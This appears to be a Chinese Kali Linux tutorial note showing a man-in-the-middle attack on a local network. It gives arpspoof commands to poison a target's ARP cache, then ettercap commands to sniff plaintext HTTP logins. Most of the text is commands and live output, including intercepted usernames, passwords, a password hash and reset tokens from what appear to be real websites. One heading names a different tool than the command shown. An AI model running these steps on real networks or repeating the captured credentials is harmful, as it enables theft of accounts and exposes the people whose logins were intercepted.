[关闭]
@websec007 2018-08-08T09:16:54.000000Z 字数 2722 阅读 1394

3、arpspoof 之HTTP协议明文密码监听

kali学习 工具收集

副标题:中间人攻击之明文密码抓取

1、工具准备

注:(1)(2)主要目的实现中间人攻击,(3)Ettercap工具的作用就是实现流量中明文密码的抓取;

2、图片流截断抓取实现流程

3、攻击场景演示(HTTP明文密码抓取)

3.1 信息收集

(1)目标主机:192.168.31.123
(2)网关地址:192.168.31.1

3.2 开启本地网卡数据转发

  1. root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

3.2 进行目标主机网关欺骗

  1. root@kali:~# arpspoof -i eth0 -t 192.168.31.123 192.168.31.1
  2. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  3. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  4. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  5. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  6. ....
  7. 不断的向网段中发送arp广播,告诉主机192.168.31.123目标网关地址的mac地址是kali主机的网卡地址,从而达到欺骗目标主机,为实现中间人攻击准备好前奏。

3.4 开启本地网卡图片抓取工具drifnet

  1. root@kali:~# ettercap -Tq -i eth0
  2. ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team
  3. Listening on:
  4. eth0 -> 00:0C:29:03:09:67
  5. 192.168.31.5/255.255.255.0
  6. fe80::20c:29ff:fe03:967/64
  7. SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
  8. Privileges dropped to UID 65534 GID 65534...
  9. 33 plugins
  10. 42 protocol dissectors
  11. 57 ports monitored
  12. 16074 mac vendor fingerprint
  13. 1766 tcp OS fingerprint
  14. 2182 known services
  15. Randomizing 255 hosts for scanning...
  16. Scanning the whole netmask for 255 hosts...
  17. * |==================================================>| 100.00 %
  18. 1 hosts added to the hosts list...
  19. Starting Unified sniffing...
  20. Text only Interface activated...
  21. Hit 'h' for inline help
  22. HTTP : 122.115.47.39:80 -> USER: account PASS: 3910298f457443292bd5c55f6e5f7955 INFO: http://www.antian365.com/forum.php
  23. CONTENT: fastloginfield=username&username=myles&password=3910298f457943393bd5c55f6e5f7955&quickforward=yes&handlekey=ls
  24. DHCP: [D4:97:0B:8B:EF:32] REQUEST 192.168.31.217
  25. HTTP : 58.216.109.182:80 -> USER: PASS: password@123 INFO: http://www.jianshu.com/users/password/mobile_reset
  26. CONTENT: utf8=%E2%9C%93&authenticity_token=dYEmtPe3i5IMls5ZlWXOjHRJq3njZw%2BJcFXUb%2BAVHjh6dc2DaCHRYUA5Ncx991ohGHBDe5UmxIbCelq2s5mpfA%3D%3D&mobile_number=153xxxxxx&country_code=CN&force_user_exist=true&sms_code=099443&captcha%5Bvalidation%5D%5Bchallenge%5D=035735baab7de19d874f29005210ab7c64&captcha%5Bvalidation%5D%5Bgt%5D=a10ea6a23a441db3d956598988dff3c4&captcha%5Bvalidation%5D%5Bvalidate%5D=b0e792abf42d9bc79be5d69c0524c036&captcha%5Bvalidation%5D%5Bseccode%5D=b0e792abf42d9bc79be5d69c0524c036%7Cjordan&captcha%5Bid%5D=8d039d96-7b0c-4c03-bf0d-2534efe82e17&geetest_challenge=035735baab7de19d874f29005210ab7c64&geetest_validate=b0e792abf42d9bc79be5d69c0524c036&geetest_seccode=b0e792abf42d9bc79be5d69c0524c036%7Cjordan&password=msfadmin%2321&password_confirmation=msfadmin%2321&commit=%E9%87%8D%E7%BD%AE%E5%AF%86%E7%A0%81
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注